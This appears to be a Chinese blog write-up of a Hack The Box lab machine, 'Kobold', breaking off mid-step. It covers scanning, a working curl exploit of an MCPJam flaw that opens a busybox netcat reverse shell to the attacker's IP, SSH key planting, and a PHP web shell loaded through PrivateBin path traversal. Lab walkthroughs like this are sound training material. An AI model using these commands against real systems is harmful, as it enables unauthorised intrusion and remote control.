{"id":418,"date":"2026-03-24T11:56:37","date_gmt":"2026-03-24T03:56:37","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=418"},"modified":"2026-05-10T09:49:13","modified_gmt":"2026-05-10T01:49:13","slug":"418","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2026\/03\/24\/418\/","title":{"rendered":"HTB\u9776\u673a Kobold \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code><strong>10.129.63.60<\/strong><\/code><strong>\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09<\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.63.60 (10.129.63.60) 56(84) bytes of data.\n64 bytes from 10.129.63.60: icmp_seq=1 ttl=63 time=119 ms\n64 bytes from 10.129.63.60: icmp_seq=2 ttl=63 time=197 ms\n64 bytes from 10.129.63.60: icmp_seq=3 ttl=63 time=221 ms\n64 bytes from 10.129.63.60: icmp_seq=4 ttl=63 time=142 ms\n\n--- 10.129.63.60 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3001ms\nrtt min\/avg\/max\/mdev = 119.234\/169.955\/221.006\/40.834 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u8fde\u63a5\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.98 scan initiated Sun Mar 22 08:14:17 2026 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.63.60\nWarning: 10.129.63.60 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.63.60\nHost is up (0.14s latency).\nNot shown: 65531 closed tcp ports (reset)\nPORT     STATE         SERVICE\n22\/tcp   open|filtered ssh\n80\/tcp   open|filtered http\n443\/tcp  open|filtered https\n3552\/tcp open|filtered taserver\n\n# Nmap done at Sun Mar 22 08:14:46 2026 -- 1 IP address (1 host up) scanned in 29.97 seconds<\/code><\/pre>\n<p>\u9776\u673a\u7591\u4f3c\u5f00\u653e\u4e86<code>4<\/code>\u4e2a<code>TCP<\/code>\u7aef\u53e3\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.98 scan initiated Sun Mar 22 08:15:42 2026 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.63.60\nWarning: 10.129.63.60 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.63.60\nHost is up (0.12s latency).\nNot shown: 48063 closed tcp ports (conn-refused), 17469 filtered tcp ports (no-response)\nPORT    STATE SERVICE  VERSION\n22\/tcp  open  ssh      OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 8c:45:12:36:03:61:de:0f:0b:2b:c3:9b:2a:92:59:a1 (ECDSA)\n|_  256 d2:3c:bf:ed:55:4a:52:13:b5:34:d2:fb:8f:e4:93:bd (ED25519)\n80\/tcp  open  http     nginx 1.24.0 (Ubuntu)\n|_http-server-header: nginx\/1.24.0 (Ubuntu)\n|_http-title: Did not follow redirect to https:\/\/kobold.htb\/\n443\/tcp open  ssl\/http nginx 1.24.0 (Ubuntu)\n| tls-alpn: \n|   http\/1.1\n|   http\/1.0\n|_  http\/0.9\n| ssl-cert: Subject: commonName=kobold.htb\n| Subject Alternative Name: DNS:kobold.htb, DNS:*.kobold.htb\n| Not valid before: 2026-03-15T15:08:55\n|_Not valid after:  2125-02-19T15:08:55\n|_http-server-header: nginx\/1.24.0 (Ubuntu)\n|_http-title: Did not follow redirect to https:\/\/kobold.htb\/\n|_ssl-date: TLS randomness does not represent time\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.19\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   215.96 ms 10.10.16.1\n2   183.77 ms 10.129.63.60\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Mar 22 08:17:51 2026 -- 1 IP address (1 host up) scanned in 128.77 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.98 scan initiated Sun Mar 22 08:20:59 2026 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.63.60\nWarning: 10.129.63.60 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.63.60\nHost is up (0.098s latency).\nAll 65535 scanned ports on 10.129.63.60 are in ignored states.\nNot shown: 65290 open|filtered udp ports (no-response), 245 closed udp ports (port-unreach)\n\n# Nmap done at Sun Mar 22 08:25:01 2026 -- 1 IP address (1 host up) scanned in 241.74 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u8fd0\u884c<code>Ubuntu Linux<\/code>\u64cd\u4f5c\u7cfb\u7edf\uff0c\u5f00\u653e\u4e86<code>22\/ssh<\/code>\u3001<code>80\/http<\/code>\u548c<code>443\/http<\/code>\u4e09\u4e2a\u670d\u52a1\uff0c\u9776\u673a\u4e3b\u57df\u540d\u4e3a<code>kobold.htb<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>ssh<\/code>\u8fde\u63a5\u9776\u673a\uff1a<\/p>\n<pre><code class=\"language-shell\">ssh root@kobold.htb<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774139866760-cc82450e-4d24-45b1-b026-707ca522a211.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9776\u673a\u5141\u8bb8\u4f7f\u7528\u5bc6\u7801\u548c\u5bc6\u94a5\u4e24\u79cd\u65b9\u5f0f\u767b\u5f55\u3002<\/p>\n<h2>Web\u5e94\u7528\u7a0b\u5e8f\uff08443\u7aef\u53e3\uff09<\/h2>\n<h3>\u865a\u62df\u4e3b\u673a\u7206\u7834<\/h3>\n<p>\u5728\u5f00\u59cb<code>Web<\/code>\u670d\u52a1\u679a\u4e3e\u524d\uff0c\u9996\u5148\u7206\u7834<code>HTTPS<\/code>\u670d\u52a1\u865a\u62df\u4e3b\u673a\uff1a<\/p>\n<pre><code class=\"language-shell\">wfuzz -w \/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/bitquark-subdomains-top100000.txt -t 70 -H \"Host: FUZZ.kobold.htb\" --hh 154 --hc 400 https:\/\/10.129.63.60<\/code><\/pre>\n<p>\u6210\u529f\u53d1\u73b0\u9776\u673a<code>HTTPS<\/code>\u670d\u52a1\u5b58\u5728\u4e24\u4e2a\u5b50\u57df\u540d\uff1a<code>mcp.kobold.htb<\/code>\u548c<code>bin.kobold.htb<\/code>\u3002<\/p>\n<h3>\u4e3b\u57df\u540d\u679a\u4e3e<\/h3>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>https:\/\/kobold.htb\/<\/code><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774151144814-e62c12eb-c4de-4265-8d8b-345a425c4db3.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>Web<\/code>\u670d\u52a1\u4e3a\u4e00\u5bb6<code>AI<\/code>\u670d\u52a1\u516c\u53f8\u7684\u4ea7\u54c1\u5ba3\u4f20\u7ad9\u70b9\uff0c\u5728\u9875\u9762\u5e95\u90e8\u53ef\u53d1\u73b0\u7535\u5b50\u90ae\u7bb1<code>admin@kobold.htb<\/code>\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774151234249-b8f6bd7d-95a2-4687-9c3c-af54f1636e17.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u76ee\u5f55\u626b\u63cf\uff0c\u4f46\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002<\/p>\n<h3>bin\u5b50\u57df\u540d\u679a\u4e3e<\/h3>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>https:\/\/bin.kobold.htb\/<\/code><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774154692694-4d6d49df-6ac3-435b-b3f0-4b5acc5c3851.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u7ad9\u70b9\u90e8\u7f72\u4e86<code>PrivateBin<\/code>\u5728\u7ebf\u526a\u5207\u677f\u7cfb\u7edf\uff0c\u7248\u672c\u4e3a<code>v2.0.2<\/code>\u3002<\/p>\n<p>\u5c1d\u8bd5\u8054\u7f51\u641c\u7d22\u8be5\u7cfb\u7edf\u6f0f\u6d1e\uff0c\u53d1\u73b0\u5b58\u5728\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e<code>CVE-2025-64714<\/code>\uff1a<a href=\"https:\/\/github.com\/PrivateBin\/PrivateBin\/security\/advisories\/GHSA-g2j9-g8r5-rg82\" target=\"_blank\"  rel=\"nofollow\" >Template-switching feature allowing arbitrary local file inclusion through path traversal \u00b7 Advisory \u00b7 PrivateBin\/PrivateBin \u00b7 GitHub<\/a><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774318221536-23a88d0f-e4f1-4404-93e4-aaafd70824ab.png\" alt=\"\" \/><\/p>\n<h3>mcp\u5b50\u57df\u540d\u679a\u4e3e<\/h3>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>https:\/\/mcp.kobold.htb\/<\/code><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774155469377-d69e7688-cdc6-44b0-b9a3-2c2957f11a1b.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u7ad9\u70b9\u90e8\u7f72\u4e86<code>MCPJam<\/code>\u5927\u6a21\u578b\u5e94\u7528\u5f00\u53d1\u5e73\u53f0\uff0c\u70b9\u51fb\u5de6\u4e0b\u89d2<code>Settings<\/code>\u6309\u94ae\uff0c\u53d1\u73b0\u8be5\u7cfb\u7edf\u7248\u672c\u4e3a<code>v1.4.2<\/code>\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774155937577-337fc3a3-3221-4b5b-aead-8f58fb98ffed.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u8054\u7f51\u641c\u7d22\u6f0f\u6d1e\uff0c\u53d1\u73b0\u8be5\u7248\u672c<code>MCPJam<\/code>\u5b58\u5728\u672a\u6388\u6743\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u7f16\u53f7\u4e3a<code>CVE-2026-23744<\/code>\uff1a<a href=\"https:\/\/github.com\/suljov\/CVE-2026-23744-Remote-Code-Execution-POC\" target=\"_blank\"  rel=\"nofollow\" >GitHub - suljov\/CVE-2026-23744-Remote-Code-Execution-POC: MCPJam inspector contains a remote code execution \u00b7 GitHub<\/a><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774158281541-1e2f9917-9108-4afd-930c-84678a1c39e4.png\" alt=\"\" \/><\/p>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u5176\u5b83\u4fe1\u606f\u3002<\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>CVE-2026-23744\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u5728<code>Web<\/code>\u670d\u52a1\u63a2\u6d4b\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u5df2\u7ecf\u53d1\u73b0\u9776\u673a<code>MCPJam v1.4.2<\/code>\u5b58\u5728\u672a\u6388\u6743\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u73b0\u5728\u8fdb\u884c\u5229\u7528\u3002<\/p>\n<p>\u9996\u5148\u8bbf\u95ee<code>[https:\/\/github.com\/suljov\/CVE-2026-23744-Remote-Code-Execution-POC\/blob\/main\/exploit.py](https:\/\/github.com\/suljov\/CVE-2026-23744-Remote-Code-Execution-POC\/blob\/main\/exploit.py)<\/code>\uff0c\u9605\u8bfb<code>EXP<\/code>\u811a\u672c\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774159181388-e93e14d6-d5b8-4700-b172-f9d31c9d7ce9.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>\/api\/mcp\/connect<\/code>\u7aef\u70b9\u5728\u63a5\u6536<code>MCP<\/code>\u670d\u52a1\u5668<code>JSON<\/code>\u914d\u7f6e\u65f6\u4f1a\u76f4\u63a5\u6267\u884c<code>serverConfig<\/code>\u4e2d\u7684\u547d\u4ee4\uff0c\u76f4\u63a5\u542f\u52a8<code>netcat<\/code>\u76d1\u542c\uff0c\u4f7f\u7528<code>curl<\/code>\u53d1\u9001\u6076\u610f<code>MCP Server<\/code>\u914d\u7f6e\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-shell\">curl -X POST https:\/\/mcp.kobold.htb\/api\/mcp\/connect -H \"Content-Type: application\/json\" -d '{\"serverConfig\": {\"command\": \"busybox\", \"args\": [\"nc\", \"10.10.16.2\", \"443\", \"-e\", \"\/bin\/bash\"], \"env\": {}}, \"serverId\": \"misaka19008\" }' -k<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774160938365-16568fb8-6caf-4d9f-a1d5-392fe8725b88.png\" alt=\"\" \/><\/p>\n<p><strong>\u53cd\u5f39Shell\u6210\u529f\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u76ee\u5f55\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u8fdb\u5165\u9776\u673a\u540e\uff0c\u76f4\u63a5\u521b\u5efa\u76ee\u5f55<code>\/home\/ben\/.ssh\/<\/code>\uff0c\u5c06\u653b\u51fb\u673a\u7684<code>SSH<\/code>\u516c\u94a5\u5199\u5165\u8be5\u76ee\u5f55\u4e0b\u7684<code>authorized_keys<\/code>\u6587\u4ef6\uff0c\u968f\u540e\u901a\u8fc7<code>SSH<\/code>\u767b\u5f55<code>ben<\/code>\u7528\u6237\uff0c\u8fdb\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\u3002<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774318561629-b4052676-e588-49ce-a382-e24ac01b8c12.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5f53\u524d\u7528\u6237\u5728<code>operator<\/code>\u7528\u6237\u7ec4\u4e2d\u3002<\/p>\n<p>\u9996\u5148\u67e5\u770b\u6839\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">ls -lA \/<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774318522277-cd272a2f-6608-4c4d-980e-374891a1b3a0.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>\/privatebin-data\/<\/code>\u76ee\u5f55\uff0c\u4e14\u5176\u5c5e\u4e3b\u4e3a<code>root<\/code>\uff0c\u5c5e\u7ec4\u4e3a<code>operator<\/code>\uff0c\u6743\u9650\u4e3a<code>770<\/code>\uff0c\u5f53\u524d\u7528\u6237\u53ef\u4ee5\u5bf9\u8be5\u76ee\u5f55\u8fdb\u884c\u5199\u5165\u3002<\/p>\n<p>\u67e5\u770b\u8be5\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">ls -lAR \/privatebin-data<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774318754833-63ff79bf-2425-462d-bd39-a853ba9aa2fa.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u76ee\u5f55\u786e\u5b9e\u4e3a<code>PrivateBin<\/code>\u7684\u6570\u636e\u76ee\u5f55\uff0c\u4f46\u76ee\u524d\u53ea\u5bf9<code>data<\/code>\u76ee\u5f55\u6709\u5199\u5165\u6743\u9650\u3002<\/p>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002<\/p>\n<h2>\u64cd\u4f5c\u7cfb\u7edf\u4fe1\u606f\u6536\u96c6<\/h2>\n<p><strong>\u57fa\u672c\u7cfb\u7edf\u4fe1\u606f<\/strong><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774319875779-d1f23233-91a8-4dae-bfcd-40732dd0c1cd.png\" alt=\"\" \/><\/p>\n<p><strong>\u8fdb\u7a0b\u5217\u8868<\/strong><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774319906856-f7f2c21f-b377-4786-9047-521b8f0995c9.png\" alt=\"\" \/><\/p>\n<p><strong>\u8ba1\u5212\u4efb\u52a1\u5217\u8868<\/strong><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774319966960-13e5c785-e958-4fc6-a833-33265ecb5381.png\" alt=\"\" \/><\/p>\n<p><strong>\u73af\u5883\u53d8\u91cf<\/strong><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774319934556-a34ea017-81cb-4466-b21d-c89cdc83f545.png\" alt=\"\" \/><\/p>\n<p><strong>\u7528\u6237\u4fe1\u606f<\/strong><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774320016869-2e7d1033-bb77-459d-b106-2408863c0e84.png\" alt=\"\" \/><\/p>\n<p><strong>\u7528\u6237\u5bb6\u76ee\u5f55<\/strong><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774320210380-f9b0aea8-1a1c-4b23-b296-7d5158ed136e.png\" alt=\"\" \/><\/p>\n<p><strong>\u7279\u6b8a\u6743\u9650\u6587\u4ef6<\/strong><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774320056155-cfa75f75-514c-4ff6-835c-a71a82bbf23c.png\" alt=\"\" \/><\/p>\n<p><strong>\u5f00\u653e\u7aef\u53e3\u4fe1\u606f<\/strong><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774320095076-a4aac958-3503-4a62-83ab-e06d146e69de.png\" alt=\"\" \/><\/p>\n<p><strong>\u654f\u611f\u6587\u4ef6\u6743\u9650<\/strong><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774320147041-4111c786-4bf0-4a6f-b08a-d39183bcd362.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9776\u673a\u672c\u5730\u5f00\u653e\u4e86<code>3552\/tcp<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u5c06\u8be5\u7aef\u53e3\u8f6c\u53d1\u5230\u653b\u51fb\u673a\u4e0a\u8fdb\u884c\u63a2\u67e5\uff1a<\/p>\n<pre><code class=\"language-shell\">ssh -fCNR 3552:localhost:3552 root@10.10.16.3 -p 22222<\/code><\/pre>\n<p>\u4f7f\u7528\u6d4f\u89c8\u5668\u8bbf\u95ee\uff1a<code>http:\/\/127.0.0.1:3552\/<\/code><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774320409613-dafd03e5-18a4-486b-b4ce-98cdc013eb89.png\" alt=\"\" \/><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u9776\u673a\u5185\u7f51<code>3552<\/code>\u7aef\u53e3\u90e8\u7f72\u4e86<code>Arcane v1.13.0<\/code>\u5728\u7ebf\u5bb9\u5668\u7ba1\u7406\u7cfb\u7edf\u3002\u5c1d\u8bd5\u4f7f\u7528\u9ed8\u8ba4\u51ed\u636e<code>arcane \/ arcane-admin<\/code>\u767b\u5f55\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774320814809-bb670cca-d475-4278-8455-e98ca7dabbaf.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u767b\u5f55\u5931\u8d25\uff0c\u4f7f\u7528<code>find<\/code>\u547d\u4ee4\u5728\u6839\u76ee\u5f55\u4e0b\u641c\u7d22\u5305\u542b<code>arcane<\/code>\u5b57\u7b26\u4e32\u7684\u6587\u4ef6\u540d\uff0c\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002\u91cd\u65b0\u5ba1\u89c6\u6574\u4e2a\u6e17\u900f\u8fc7\u7a0b\uff0c\u51b3\u5b9a\u4f7f\u7528<code>CVE-2025-64714<\/code>\u6f0f\u6d1e\u653b\u51fb<code>PrivateBin<\/code>\u5728\u7ebf\u526a\u8d34\u677f\uff0c\u8fdb\u5165<code>Docker<\/code>\u5bb9\u5668\u4e2d\u8fdb\u4e00\u6b65\u679a\u4e3e\u3002\uff08\u4ece\u8fdb\u7a0b\u5217\u8868\u548c<code>Nginx<\/code>\u914d\u7f6e\u6587\u4ef6\u53ef\u5f97\u77e5<code>PrivateBin<\/code>\u8fd0\u884c\u4e8e<code>Docker<\/code>\u5bb9\u5668\u4e2d\uff09<\/p>\n<h2>CVE-2025-64714\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u5728\u64cd\u4f5c\u7cfb\u7edf\u4fe1\u606f\u6536\u96c6\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u6210\u529f\u53d1\u73b0\u9776\u673a\u5185\u7f51<code>3552<\/code>\u7aef\u53e3\u8fd0\u884c<code>Arcane<\/code>\u5728\u7ebf\u5bb9\u5668\u7ba1\u7406\u7cfb\u7edf\uff0c\u786e\u5b9a\u4e86\u4f7f\u7528<code>CVE-2025-64714<\/code>\u6f0f\u6d1e\u653b\u51fb<code>PrivateBin<\/code>\uff0c\u8fdb\u800c\u679a\u4e3e\u5176\u6240\u5728\u5bb9\u5668\u7684\u6e17\u900f\u8def\u5f84\uff0c\u73b0\u5728\u8fdb\u884c\u5229\u7528\u3002<\/p>\n<p>\u9996\u5148\uff0c\u8fd4\u56de\u9776\u673a\u7684<code>SSH<\/code>\u4f1a\u8bdd\uff0c\u5728<code>\/privatebin-data\/data\/<\/code>\u4e0b\u521b\u5efa\u6076\u610f<code>PHP<\/code>\u6728\u9a6c<code>misaka.php<\/code>\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php system($_GET['cmd']); ?&gt;<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774321919598-ec37ec28-67cd-428d-8d80-503062ae0597.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u8bbf\u95ee<code>https:\/\/bin.kobold.htb\/<\/code>\uff0c\u5728\u526a\u8d34\u677f\u4e0a\u968f\u4fbf\u5199\u5165\u4e00\u4e9b\u5185\u5bb9\uff0c\u70b9\u51fb<code>Create<\/code>\u6309\u94ae\u521b\u5efa\u540e\uff0c\u8bbf\u95ee\u751f\u6210\u7684\u5185\u5bb9\u94fe\u63a5\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774321568966-c4351150-9cb2-48f9-b845-02224581c522.png\" alt=\"\" \/><\/p>\n<p>\u6253\u5f00<code>BurpSuite<\/code>\uff0c\u5c06\u8bf7\u6c42\u8f6c\u53d1\u5230<code>Repeater<\/code>\u6a21\u5757\uff0c\u4fee\u6539<code>Cookie<\/code>\u4e2d\u7684<code>template<\/code>\u53c2\u6570\u4e3a\u6728\u9a6c\u7a0b\u5e8f\u7684\u76f8\u5bf9\u8def\u5f84\uff1a<code>..\/data\/misaka<\/code>\uff0c\u5e76\u5728<code>URI<\/code>\u4e2d\u6dfb\u52a0<code>cmd<\/code>\u53c2\u6570\uff1a<\/p>\n<p><!-- 